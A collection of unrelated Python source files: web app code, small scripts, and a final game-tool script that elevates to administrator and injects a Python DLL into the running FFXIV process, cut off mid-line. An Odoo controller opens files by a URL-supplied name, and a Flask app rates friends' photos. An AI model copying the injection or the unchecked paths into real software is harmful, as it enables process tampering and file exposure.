True\nCMS_REDIRECTS = True\nCMS_FLAT_URLS = True\nCMS_SOFTROOT = False\n\nCMS_PERMISSION = False\nCMS_MODERATOR = False\nCMS_SHOW_START_DATE = True\nCMS_SHOW_END_DATE = True\nCMS_SEO_FIELDS = False\nPLACEHOLDER_FRONTEND_EDITING = False\n\nCMSPLUGIN_BLOG_PLACEHOLDERS = ('on_index_page', 'the_rest')\n\nJQUERY_JS = os.path.join(STATIC_URL, 'wlansi', 'jquery', 'jquery.min.js')\nJQUERY_UI_CSS = os.path.join(STATIC_URL, 'wlansi', 'jquery', 'jquery-ui.min.css')\nJQUERY_UI_JS = os.path.join(STATIC_URL, 'wlansi', 'jquery', 'jquery-ui.min.js')\n\nTHUMBNAIL_DEBUG = False\nTHUMBNAIL_QUALITY = 95\nTHUMBNAIL_PROCESSORS = (\n 'easy_thumbnails.processors.colorspace',\n 'easy_thumbnails.processors.autocrop',\n 'filer.thumbnail_processors.scale_and_crop_with_subject_location',\n 'easy_thumbnails.processors.filters',\n)\n\nVIDEO_WIDTH = 480\nVIDEO_HEIGHT = 360\nVIDEO_FULLSCREEN = False\n\nFILER_PAGINATE_BY = 50\nFILER_SUBJECT_LOCATION_IMAGE_DEBUG = False\nFILER_IS_PUBLIC_DEFAULT = True\nFILER_IMAGE_USE_ICON = True\nFILER_ENABLE_PERMISSIONS = True\n\nFILER_PUBLICMEDIA_ROOT = os.path.join(MEDIA_ROOT, 'files')\nFILER_PUBLICMEDIA_URL = 
os.path.join(MEDIA_URL, 'files/')\nFILER_PUBLICMEDIA_THUMBNAIL_ROOT = os.path.join(MEDIA_ROOT, 'thumbnails')\nFILER_PUBLICMEDIA_THUMBNAIL_URL = os.path.join(MEDIA_URL, 'thumbnails/')\nFILER_PRIVATEMEDIA_ROOT = os.path.abspath(os.path.join(MEDIA_ROOT, '..', 'smedia', 'files'))\nFILER_PRIVATEMEDIA_URL = '/smedia/files/'\nFILER_PRIVATEMEDIA_THUMBNAIL_ROOT = os.path.abspath(os.path.join(MEDIA_ROOT, '..', 'smedia', 'thumbnails'))\nFILER_PRIVATEMEDIA_THUMBNAIL_URL = '/smedia/thumbnails/'\n\nclass AllIPs(list):\n def __contains__(self, ip):\n return True\n\nif DEBUG:\n # So that headers and template contexts are populated with debug data\n INTERNAL_IPS = AllIPs()\n\nfrom filer.storage import PublicFileSystemStorage, PrivateFileSystemStorage\n\nFILER_PUBLICMEDIA_STORAGE = PublicFileSystemStorage(\n location=FILER_PUBLICMEDIA_ROOT,\n base_url=FILER_PUBLICMEDIA_URL\n)\nFILER_PUBLICMEDIA_THUMBNAIL_STORAGE = PublicFileSystemStorage(\n location=FILER_PUBLICMEDIA_THUMBNAIL_ROOT,\n base_url=FILER_PUBLICMEDIA_THUMBNAIL_URL\n)\nFILER_PRIVATEMEDIA_STORAGE = PrivateFileSystemStorage(\n location=FILER_PRIVATEMEDIA_ROOT,\n base_url=FILER_PRIVATEMEDIA_URL\n)\nFILER_PRIVATEMEDIA_THUMBNAIL_STORAGE = PrivateFileSystemStorage(\n location=FILER_PRIVATEMEDIA_THUMBNAIL_ROOT,\n base_url=FILER_PRIVATEMEDIA_THUMBNAIL_URL\n)\n\nCMSPLUGIN_FILER_FOLDER_VIEW_OPTIONS = (\n ('slideshow', 'Slideshow'),\n ('list', 'List'),\n)\n\nSUPPORTERS_FILER_FOLDER_NAME = 'Supporters'\n","sub_path":"mainpage/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":12910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"260042229","text":"from django.shortcuts import render\nfrom rest_framework import viewsets\nfrom rest_framework.views import APIView\nfrom .serializers import NodeSerializer, HistorySerializer, TeamSerializer, ProfileSerializer, CommentSerializer, ProfileInfoSerializer, BaseCommentSerializer, ImageSerializer, UserSerializer, TeamHistorySerializer, TeamMembersSerializer\nfrom .models import Node, Team, Profile, Comment, Image\nfrom rest_framework import generics, permissions\nfrom rest_framework.response import Response\nfrom knox.models import AuthToken\nfrom .serializers import RegisterSerializer\nfrom django.contrib.auth.models import User\nfrom rest_framework import status\n\nfrom django.contrib.auth import login\n\nfrom rest_framework import permissions\nfrom rest_framework.authtoken.serializers import AuthTokenSerializer\nfrom knox.views import LoginView as KnoxLoginView\nfrom rest_framework.decorators import action\n\n\nclass NodeView(viewsets.ModelViewSet):\n serializer_class = NodeSerializer\n queryset = Node.objects.filter(parent=None)\n\n\nclass AllNodesView(viewsets.ModelViewSet):\n # this view should probably be the same as NodeView at somepoint\n serializer_class = NodeSerializer\n queryset = Node.objects.all()\n\n @action(detail=True, methods=['get'])\n def comments(self, request, pk=None):\n node = self.get_object()\n comments = node.comments.all()\n return Response(CommentSerializer(comments, many=True).data)\n\n @action(detail=True, methods=['get'])\n def images(self, request, pk=None):\n node = self.get_object()\n images = node.images.all()\n return Response(ImageSerializer(images, many=True).data)\n\n\nclass TeamsView(viewsets.ModelViewSet):\n # this view should probably be the same as NodeView at somepoint\n serializer_class = TeamSerializer\n queryset = Team.objects.all()\n\n @ action(detail=True, methods=['get'], 
serializer_class=NodeSerializer)\n def nodes(self, request, pk=None):\n """\n Returns a list of all the nodes that the given\n team owns.\n """\n # print(request.data)\n team = self.get_object()\n nodes = team.nodes.all()\n return Response(nodes.values())\n\n @ action(detail=True, methods=['post'])\n def update_nodes(self, request, pk=None):\n """\n Updates the list of all the nodes that the given\n team owns.\n """\n # print(request.data)\n node = Node.objects.get(id=request.data['id'])\n team = self.get_object()\n team.nodes.add(node)\n team.save()\n nodes = team.nodes.all()\n return Response(nodes.values())\n\n\nclass ProfilesView(viewsets.ModelViewSet):\n # this view should probably be the same as NodeView at some point\n serializer_class = ProfileSerializer\n queryset = Profile.objects.all()\n\n @ action(detail=True, methods=['put'])\n def join_team(self, request, pk=None):\n """\n joins a team that the given profile requests\n """\n # print(request.data)\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n team = Team.objects.get(unique_key=request.data['unique_key'])\n pfile = self.get_object()\n # maybe check that the user is already on this team before adding\n pfile.teams.add(team)\n # Model.save() returns None, so serialize the saved instance itself\n pfile.save()\n return Response(ProfileSerializer(pfile, context=self.get_serializer_context()).data)\n\n @ action(detail=True, methods=['put'])\n def leave_team(self, request, pk=None):\n """\n leaves a team that the given profile is subscribed to\n """\n # print(request.data)\n team = Team.objects.get(id=request.data['id'])\n profile = self.get_object()\n profile.teams.remove(team)\n profile.save()\n teams = profile.teams.all()\n return Response(teams.values())\n\n @ action(detail=True, methods=['get'])\n def view_teams(self, request, pk=None):\n """\n views the teams the given user is subscribed to\n """\n # print(request.data)\n profile = self.get_object()\n teams = profile.teams.all()\n res = []\n for team in teams:\n # print(Profile.objects.filter(\n # teams=team).prefetch_related('username').values())\n # profs = Profile.objects.filter(teams=team).values()\n # for prof in profs:\n # print(ProfileSerializer(\n # prof, context=self.get_serializer_context()).data)\n data = {\"id\": team.id, \"name\": team.name, \"description\": team.description, \"unique_key\": team.unique_key, \"members\": list(\n Profile.objects.filter(teams=team).values())}\n res.append(data)\n # print(res)\n return Response(res)\n\n\nclass CommentsView(viewsets.ModelViewSet):\n serializer_class = CommentSerializer\n queryset = Comment.objects.all()\n\n\nclass BaseCommentsView(viewsets.ModelViewSet):\n serializer_class = BaseCommentSerializer\n queryset = Comment.objects.all()\n\n\nclass ImagesView(viewsets.ModelViewSet):\n serializer_class = ImageSerializer\n queryset = Image.objects.all()\n\n\nclass UserView(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n http_method_names = ['get']\n\n\nclass UserExists(APIView):\n """\n Check whether a user with the given username exists.\n """\n\n def get(self, request, format=None, *args, **kwargs):\n if User.objects.filter(username=self.kwargs['username']).exists():\n return Response({'exists': True})\n # serializer = UserSerializer(user, many=True)\n return Response({'exists': False})\n\n\nclass HistoryView(viewsets.ModelViewSet):\n serializer_class = HistorySerializer\n queryset = Node.objects.all()\n\n\n
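[Editor's aside: the ProfilesView above builds its extra routes on Django REST Framework's @action decorator. A minimal, self-contained sketch of that pattern follows; ExampleViewSet and its route name are hypothetical and not part of this repo.]
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.response import Response

class ExampleViewSet(viewsets.ViewSet):
    # detail=True routes this method as GET /examples/<pk>/related/
    @action(detail=True, methods=['get'])
    def related(self, request, pk=None):
        return Response({'pk': pk})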
class TeamHistoryView(viewsets.ModelViewSet):\n serializer_class = TeamHistorySerializer\n queryset = Team.objects.all()\n\n\n# Register API\nclass RegisterAPI(generics.GenericAPIView):\n serializer_class = RegisterSerializer\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.save()\n return Response({\n \"user\": ProfileSerializer(user, context=self.get_serializer_context()).data,\n \"token\": AuthToken.objects.create(user)[1]\n })\n\n\nclass LoginAPI(KnoxLoginView):\n permission_classes = (permissions.AllowAny,)\n\n def post(self, request, format=None):\n serializer = AuthTokenSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n u = Profile.objects.filter(user=user)\n profile = u.values('id').first()\n user_id = user.id\n login(request, user)\n res = super(LoginAPI, self).post(request, format=None)\n res.data['user_id'] = user_id\n res.data['profile_id'] = profile['id']\n\n return Response(res.data)\n # return super(LoginAPI, self).post(request, format=None)\n","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"582222940","text":"import pygame\nimport cloud\nimport mountain\n\nclass Sky:\n\n\tdef __init__(self, x, y, width, height, color):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.skyHeight = self.height//3 * 2\n\t\tself.color = color\n\t\tself.mCloud = cloud.Cloud(width, height, 10)\n\t\tself.sunColor = (255, 255, 0)\n\t\tself.mountainColor = (59, 47, 71)\n\t\tself.mMountainList = [\n\t\t\tmountain.Mountain([[0, self.skyHeight], [100, self.height//3], [200, self.skyHeight]], 0, self.mountainColor),\n\t\t\tmountain.Mountain([[150, self.skyHeight], [250, self.height//2], [350, self.skyHeight]], 0, self.mountainColor),\n\t\t]\n\n\tdef draw(self, surface):\n\t\trect = pygame.Rect(0, 0, self.width, self.skyHeight)\n\t\tpygame.draw.rect(surface, self.color, rect)\n\t\tpygame.draw.circle(surface, self.sunColor, (self.width - 100, 100), 30, 0)\n\t\tself.mCloud.draw(surface)\n\n\t\tfor m in self.mMountainList:\n\t\t\tm.draw(surface)","sub_path":"pygame-starter-lean/sky.py","file_name":"sky.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"341833","text":"def main():\n n = int(input())\n ss = [list(input()) for _ in range(n)]\n\n ss_set = sorted(list(set(ss[0])))\n ans = ''\n\n for ch in ss_set:\n cnt = min(ss[i].count(ch) for i in range(n))\n ans += ch * cnt\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python_codes/p03761/s905895112.py","file_name":"s905895112.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
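[Editor's aside: the solution just above takes per-character minima across the input strings; the same multiset intersection can be written with collections.Counter, whose & operator keeps elementwise minimum counts. A generic sketch, not part of the original file:]
from collections import Counter
from functools import reduce

def common_chars(strings):
    # Counter & Counter keeps the elementwise minimum of the counts
    counts = reduce(lambda a, b: a & b, map(Counter, strings))
    return ''.join(ch * counts[ch] for ch in sorted(counts))

assert common_chars(['cbaa', 'daacc', 'acacac']) == 'aac'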
img)\ncv2.imshow(\"Media do F1 3x3\", media1)\ncv2.imshow(\"Media do F2 3x3\", media2)\ncv2.imshow(\"Media do F3 3x3\", media3)\ncv2.imshow(\"Media do F4 3x3\", media4)\ncv2.waitKey()\n","sub_path":"Lista_de_Exercicios/atividade6.py","file_name":"atividade6.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"237670155","text":"from math import *\ndef func(x):\n return x*x*x-4*x+4\n # return x*x*x*x-x-10\n # return x*exp(x)-cos(x*180/(pi))\n\ndef secant_method(x0,x1):\n # while True:\n while True:\n x2 = x1 - (func(x1) *(x1 - x0)) / (func(x1) - func(x0))\n errConvergence=(x2-x1)/x1\n if func(x2)>0:\n x1=x2\n elif func(x2)==0:\n print(x2)\n print(errConvergence)\n break\n else:\n x0=x2\n\nx0=float(input(\"enter a number\"))\nx1=float(input(\"enter another number\"))\nsecant_method(x0,x1)\n","sub_path":"secant_method.py","file_name":"secant_method.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"423423884","text":"# -*- coding: utf-8 -*\n# Typical usage scenario:\n# Request main page(get session id) -> Provide user id to parse friends from ->\n# Request voting page -> Vote -> Request voting page ->...\n\n# Url map:\n# /\n# /api/vote/\t\t(parameters: id_voted)\n# /api/rating/\t\t(parameters: lower_rank, higher_rank) \n# /api/get_random_pair/\n# /vote/left/\t\tDEPRECATED\n# /vote/right/\t\tDEPRECATED\n\nfrom flask import Flask, render_template, \\\n\tjsonify, request, make_response, redirect, \\\n\turl_for, g, json\nfrom db import Db\nfrom vk import VK\nfrom credentials import dbCredentials\n\napp = Flask(__name__)\ndb = Db(**dbCredentials)\n\n@app.before_request\ndef dbConnect():\n\tdb.connect()\n\tg.db = db\n\n@app.teardown_request\ndef dbCleanup(exception):\n\tdb = getattr(g, 'db', None)\n\tif db is not None:\n\t\tdb.disconnect()\n\ndef parseVkId(str):\n\tparsedId = None\n\t# Try parsing without regexps for the sake of speed and simplicity\n\tif str is None or len(str) == 0:\n\t\traise ValueError('Cannot parse vk id from {}'.format(str))\n\tindx = str.find('vk.com/')\n\tif indx < 0:\n\t\t# Maybe we got an already parsed vk_id?\n\t\ttry:\n\t\t\tparsedId = int(str)\n\t\texcept ValueError:\n\t\t\t# Nope, we didnt. Report error\n\t\t\traise ValueError('Cannot parse vk id from {}'.format(str))\n\telse:\n\t\tindx += len('vk.com/')\n\t\tparsedId = str[indx:]\n\t\n\t# Now we need to make sure that user with such id exists\n\tid = VK.getIdByShortName(parsedId)\n\treturn id\n\nclass Girl:\n\tdef __init__(self, id, pic):\n\t\tself.pic = pic\n\t\tself.id = id\n\n\n\nclass GirlPair:\n\tdef __init__(self, girl1, girl2):\n\t\tself.girl1 = girl1\n\t\tself.girl2 = girl2\n\t\t\n\t@staticmethod\n\tdef getRandomPair(session_id, db):\n\t\tid = db.getRandomIdPairForSession(session_id)\n\t\t#get pics from vk by returned ids\n\t\tpic = (VK.getPicUrlById(id[0]), VK.getPicUrlById(id[1]))\n\t\tgirls = (Girl(id[0], pic[0]), Girl(id[1], pic[1]))\n\t\treturn girls\n\n\n# web-interface method\n@app.route(\"/\")\ndef getMain():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\t\n\tvkIdRaw = request.args.get('vk_id')\n\t\n\tif vkIdRaw is None and vkIdStored is None:\n\t\t# No vk_id has been provided yet. 
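[Editor's aside: the secant_method above keeps a sign bracket like regula falsi; the textbook secant update instead always discards the older of the two points. A sketch for comparison, using the same test function:]
def secant(f, x0, x1, tol=1e-12, max_iter=100):
    for _ in range(max_iter):
        x2 = x1 - f(x1) * (x1 - x0) / (f(x1) - f(x0))
        if abs(x2 - x1) < tol:
            return x2
        x0, x1 = x1, x2
    return x1

root = secant(lambda x: x * x * x - 4 * x + 4, -3.0, -2.0)
assert abs(root ** 3 - 4 * root + 4) < 1e-9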
+{"seq_id":"423423884","text":"# -*- coding: utf-8 -*-\n# Typical usage scenario:\n# Request main page(get session id) -> Provide user id to parse friends from ->\n# Request voting page -> Vote -> Request voting page ->...\n\n# Url map:\n# /\n# /api/vote/\t\t(parameters: id_voted)\n# /api/rating/\t\t(parameters: lower_rank, higher_rank) \n# /api/get_random_pair/\n# /vote/left/\t\tDEPRECATED\n# /vote/right/\t\tDEPRECATED\n\nfrom flask import Flask, render_template, \\\n\tjsonify, request, make_response, redirect, \\\n\turl_for, g, json\nfrom db import Db\nfrom vk import VK\nfrom credentials import dbCredentials\n\napp = Flask(__name__)\ndb = Db(**dbCredentials)\n\n@app.before_request\ndef dbConnect():\n\tdb.connect()\n\tg.db = db\n\n@app.teardown_request\ndef dbCleanup(exception):\n\tdb = getattr(g, 'db', None)\n\tif db is not None:\n\t\tdb.disconnect()\n\ndef parseVkId(str):\n\tparsedId = None\n\t# Try parsing without regexps for the sake of speed and simplicity\n\tif str is None or len(str) == 0:\n\t\traise ValueError('Cannot parse vk id from {}'.format(str))\n\tindx = str.find('vk.com/')\n\tif indx < 0:\n\t\t# Maybe we got an already parsed vk_id?\n\t\ttry:\n\t\t\tparsedId = int(str)\n\t\texcept ValueError:\n\t\t\t# Nope, we didn't. Report error\n\t\t\traise ValueError('Cannot parse vk id from {}'.format(str))\n\telse:\n\t\tindx += len('vk.com/')\n\t\tparsedId = str[indx:]\n\t\n\t# Now we need to make sure that user with such id exists\n\tid = VK.getIdByShortName(parsedId)\n\treturn id\n\nclass Girl:\n\tdef __init__(self, id, pic):\n\t\tself.pic = pic\n\t\tself.id = id\n\n\n\nclass GirlPair:\n\tdef __init__(self, girl1, girl2):\n\t\tself.girl1 = girl1\n\t\tself.girl2 = girl2\n\t\t\n\t@staticmethod\n\tdef getRandomPair(session_id, db):\n\t\tid = db.getRandomIdPairForSession(session_id)\n\t\t#get pics from vk by returned ids\n\t\tpic = (VK.getPicUrlById(id[0]), VK.getPicUrlById(id[1]))\n\t\tgirls = (Girl(id[0], pic[0]), Girl(id[1], pic[1]))\n\t\treturn girls\n\n\n# web-interface method\n@app.route(\"/\")\ndef getMain():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\t\n\tvkIdRaw = request.args.get('vk_id')\n\t\n\tif vkIdRaw is None and vkIdStored is None:\n\t\t# No vk_id has been provided yet. Wait for it\n\t\tresp = make_response(render_template('index.html'))\n\t\tresp.set_cookie('session_id', str(sessionId))\n\t\treturn resp\n\t\n\tvkId = None\n\ttry:\n\t\tvkId = parseVkId(vkIdRaw)\n\t\tvkId = VK.getIdByShortName(vkId)\n\texcept ValueError:\n\t\tif vkIdStored is None:\n\t\t\treturn redirect(url_for('getMain'))\n\t\n\tif vkId is None and vkIdStored is not None:\n\t\tvkId = vkIdStored\n\telif vkId != vkIdStored:\n\t\tdb.cleanupUsersForSession(sessionId)\n\t\tdb.updateStoredVkIdForSession(sessionId, vkId)\n\t\n\t# At this point we know we have an id, but we don't know whether\n\t# this user's friends have already been loaded. Check for that.\n\t\n\tif not db.areFriendsLoaded(sessionId):\n\t\tfriends = VK.getFriendsIds(vkId)\n\t\tdb.cleanupUsersForSession(sessionId)\n\t\tdb.storeUsersForSession(sessionId, friends)\n\t\n\t# Now we know the friends info is in the database. Fetch a random\n\t# pair and load links to their avatars from VK.\n\tgirl1, girl2 = GirlPair.getRandomPair(sessionId, db)\n\t# Update the session record with the new girl ids\n\tdb.updateStoredGirlsForSession(sessionId, girl1.id, girl2.id)\n\t\n\t# Now we have the girls' photos. Render the main page template\n\t# with the photos inserted and return it.\n\tresp = make_response(render_template('index.html',\\\n\t\tvk_id=vkId, girl1=girl1, girl2=girl2))\n\tresp.set_cookie('session_id', str(sessionId))\n\treturn resp\n\n# Vote for left girl and redirect to index\n@app.route(\"/vote/left/\")\ndef voteLeft():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\n\tif girlLeftStored is not None and girlRightStored is not None:\n\t\tdb.storeChosenGirl(girlLeftStored, girlRightStored)\n\t\t\n\treturn redirect(url_for('getMain'))\n\n@app.route(\"/vote/right/\")\ndef voteRight():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\tif girlLeftStored is not None and girlRightStored is not None:\n\t\tdb.storeChosenGirl(girlRightStored, girlLeftStored)\n\t\t\n\treturn redirect(url_for('getMain'))\n\n@app.route(\"/vote/skip/\")\ndef voteSkip():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\t\n\treturn redirect(url_for('getMain'))\n\n#api method\n@app.route(\"/api/get_random_pair\", methods=['GET'])\ndef getGirlPair():\n\tdb = getattr(g, 'db', None)\n\t#!! 
TODO: add error processing here\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\trandomPair = GirlPair.getRandomPair(sessionId, db)\n\t# Girl objects are not JSON serializable directly, so expose their fields\n\treturn json.jsonify(girls=[vars(girl) for girl in randomPair])\n\n@app.route(\"/api/vote/\", methods=['GET'])\ndef vote():\n\tdb = getattr(g, 'db', None)\n\tsessionId, vkIdStored, girlLeftStored, girlRightStored = getSessionParams(db)\n\t\n\ttry:\n\t\tidVoted = int(request.args.get('id_voted'))\n\texcept (TypeError, ValueError):\n\t\treturn json.jsonify(\n\t\t\terror=True,\n\t\t\terror_description='Cannot resolve id_voted'\n\t\t)\n\t\n\tif girlLeftStored is not None and girlRightStored is not None:\n\t\t# pick the stored id that was not voted for\n\t\tidNonVoted = (set((girlLeftStored, girlRightStored)) - {idVoted}).pop()\n\t\tdb.storeChosenGirl(girlBetterId=idVoted, girlWorseId=idNonVoted)\n\t\treturn json.jsonify(\n\t\t\tid_voted=idVoted,\n\t\t\tid_non_voted=idNonVoted\n\t\t)\n\treturn json.jsonify(\n\t\terror=True,\n\t\terror_description='No girl pair stored for this session'\n\t)\n\n@app.route(\"/api/rating/\", methods=['GET'])\ndef getRatingApi():\n\tdb = getattr(g, 'db', None)\n\ttry:\n\t\tlowerRank = int(request.args.get('lower_rank'))\n\t\thigherRank = int(request.args.get('higher_rank'))\n\t\tassert lowerRank <= higherRank\n\t\tassert lowerRank >= 0\n\t\tassert higherRank - lowerRank < 100\n\texcept (TypeError, ValueError, AssertionError):\n\t\treturn json.jsonify(\n\t\t\tranks=[],\n\t\t\terror=True,\n\t\t\terror_description='Invalid parameters for request'\n\t\t)\n\treturn json.jsonify(ranks=db.getRating(lowerRank, higherRank))\n\t\n\ndef getSessionParams(db):\n\tsessionId = request.cookies.get('session_id')\n\tif sessionId is None:\n\t\t#no session id found. Start new session\n\t\tsessionId = db.createSession()\n\t# Check if such session id is in db\n\tsessionIdStored, vkIdStored, girlLeftStored, girlRightStored = \\\n\t\tdb.getSessionParams(sessionId)\n\tif sessionIdStored is None:\n\t\tsessionId = db.createSession()\n\treturn (sessionId, vkIdStored, girlLeftStored, girlRightStored)\n\nif __name__ == '__main__':\n\tapp.run()\n","sub_path":"yabivdul.py","file_name":"yabivdul.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"504143534","text":"# -*- coding: utf-8 -*-\nfrom odoo import http, _\nimport tempfile, os\nfrom odoo.addons.web.controllers.main import serialize_exception,content_disposition\nimport base64\n\ntry:\n import openpyxl\n from xlsx2html.core import worksheet_to_data,render_data_to_html\nexcept:\n pass\n\n\nclass PreviewXlsxReport(http.Controller):\n @http.route(\n ['/preview-xlsx-report//'],\n auth='user', website=True)\n def main_report(self, file_name, report_name, **kw):\n file_path = os.path.join(tempfile.gettempdir(), file_name)\n\n sheets = []\n wb = openpyxl.load_workbook(file_path, data_only=True)\n\n for sheet_name in wb.get_sheet_names():\n ws = wb[sheet_name]\n data = worksheet_to_data(ws, locale='ru')\n html = render_data_to_html(data)\n sheets.append(\n {\n 'html': html,\n 'name': sheet_name\n }\n )\n\n datas = {\n 'sheets': sheets,\n 'title': '',\n 'file_name': file_name,\n 'report_name': _(report_name) + '.xlsx',\n }\n\n return http.request.render(\n 'preview_xlsx_report.preview_xlsx_report_template',\n datas)\n\n @http.route(\n ['/download-xlsx-report//'],\n auth='user', website=True)\n def download_xlsx_report(self, file_name, report_name, **kw):\n file_path = os.path.join(tempfile.gettempdir(), file_name)\n xlsx_file = open(file_path, \"rb\")\n filecontent = base64.b64encode(xlsx_file.read())\n\n content_disposition = http.content_disposition(report_name)\n\n headers = [('Content-Type', u'application/javascript'),\n ('X-Content-Type-Options', 'nosniff'),\n ('ETag', 
'\"56d3b71b5852986e17f6edca970a84d6\"'),\n ('Cache-Control', 'max-age=0'),\n ('Content-Disposition',\n content_disposition\n )]\n\n content_base64 = base64.b64decode(filecontent)\n headers.append(('Content-Length', len(content_base64)))\n\n response = http.request.make_response(content_base64, headers)\n return response\n","sub_path":"ERP_IN/addons/preview_xlsx_report/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"428956011","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Sookplace\nfrom .forms import SookplaceForm\nfrom django.contrib.auth.models import User\n\n\n\n# Create your views here.\n#게시물 리스트\ndef sookplace_list(request):\n sookplaces = Sookplace.objects \n return render(request, 'sookplaceapp/sookplace_list.html', {'sookplaces' : sookplaces})\n\n\n#게시물 상세페이지 (R)\ndef sookplace_detail(request, sookplace_id):\n sookplace = get_object_or_404(Sookplace, pk=sookplace_id)\n return render(request, 'sookplaceapp/sookplace_detail.html', {'sookplace':sookplace})\n\n#게시물 등록 (C)\n@login_required\ndef sookplace_register(request):\n if request.method == 'POST':\n form = SookplaceForm(request.POST, request.FILES)\n if form.is_valid():\n sookplace = form.save(commit=False)\n sookplace.user = request.user ##username 자동 설정\n sookplace.save()\n return redirect('sookplaceapp:sookplace_list')\n else : \n form=SookplaceForm()\n return render(request, 'sookplaceapp/sookplace_register.html', {'form':form})\n\n#게시물 수정(U)\n@login_required\ndef sookplace_update(request, sookplace_id):\n sookplace = get_object_or_404(Sookplace, pk=sookplace_id)\n if request.method=='POST':\n form = SookplaceForm(request.POST, instance=sookplace)\n if form.is_valid():\n sookplace = form.save(commit=False)\n sookplace.user = request.user ##username 자동 설정\n sookplace.save()\n return redirect('sookplaceapp:sookplace_detail', sookplace_id=sookplace.pk) \n else:\n if sookplace.user == User.objects.get(username=request.user.get_username()) : ##자신의 글일때만 수정 가능\n form = SookplaceForm(instance=sookplace)\n return render(request, 'sookplaceapp/sookplace_update.html', {'form':form})\n\n else :\n return redirect('sookplaceapp:sookplace_detail', sookplace_id=sookplace.pk) ##자신의 글 아니면 해당글 detail로 redirect\n\n\n#게시물 삭제(D)\n@login_required\ndef sookplace_delete(request, sookplace_id):\n sookplace = get_object_or_404(Sookplace, pk=sookplace_id)\n if sookplace.user == User.objects.get(username=request.user.get_username()) : ##자신의 글일때만 삭제 가능\n sookplace.delete()\n return redirect('sookplaceapp:sookplace_list')\n else:\n return redirect('sookplaceapp:sookplace_detail', sookplace_id=sookplace.pk) ##자신의 글 아니면 해당글 detail로 redirect\n","sub_path":"sookplaceapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"518051867","text":"# -*- coding: utf-8 -*-\nfrom django.utils.safestring import mark_safe\n\n\nPERSON_HELP_TEXTS = {\n 'is_agreed_nominator': mark_safe(\n \"\"\"Before submitting your nomination, please \n click here to read our privacy notice \n and tick this box to confirm that you have read the policy notice and consent to the \n processing of your personal data and sensitive personal data.\"\"\"\n ),\n 'is_agreed': mark_safe(\n \"\"\"Before submitting this form, please\n 
click here to read our privacy policy\n and tick this box to confirm that you have read the policy notice and consent to the \n processing of your personal data and sensitive personal data.\"\"\"\n )\n}\n","sub_path":"apps/people/help_texts.py","file_name":"help_texts.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"594286009","text":"from FFxivPythonTrigger.memory.res import kernel32, structure\nfrom FFxivPythonTrigger.memory import process, memory\nimport ctypes\nimport locale\nimport sys\nimport os\nfrom json import dumps\nimport _thread\nimport socket\nimport time\n\ntry:\n is_admin = ctypes.windll.shell32.IsUserAnAdmin()\nexcept:\n is_admin = False\nif not is_admin:\n ctypes.windll.shell32.ShellExecuteW(None, \"runas\", sys.executable, sys.argv[0], None, 1)\n exit()\n\nendl = \"\\n\"\n\nname = \"ffxiv_dx11.exe\"\npid = None\nprint(\"start searching for game process...\")\nwhile pid is None:\n for p in process.list_processes():\n if name in p.szExeFile.decode(locale.getpreferredencoding()).lower():\n pid = p.th32ProcessID\n break\n time.sleep(1)\nprint(\"game process pid: %s\" % pid)\ntime.sleep(3)\nhandler = kernel32.OpenProcess(structure.PROCESS.PROCESS_ALL_ACCESS.value, False, pid)\nif not handler:\n input(\"could not open process\" + endl)\n exit()\n\n# find the python library\npython_version = \"python{0}{1}.dll\".format(sys.version_info.major, sys.version_info.minor)\npython_lib = process.module_from_name(python_version).filename\n\n# Find or inject python module\npython_module = process.module_from_name(python_version, handler)\nif python_module:\n python_lib_h = python_module.lpBaseOfDll\nelse:\n python_lib_h = process.inject_dll(bytes(python_lib, 'ascii'), handler)\n if not python_lib_h:\n print(\"inject failed\" + endl)\n exit()\n\nlocal_handle = kernel32.GetModuleHandleW(python_version)\n\ndif = python_lib_h - local_handle\nfuncs = {k: dif + kernel32.GetProcAddress(local_handle, 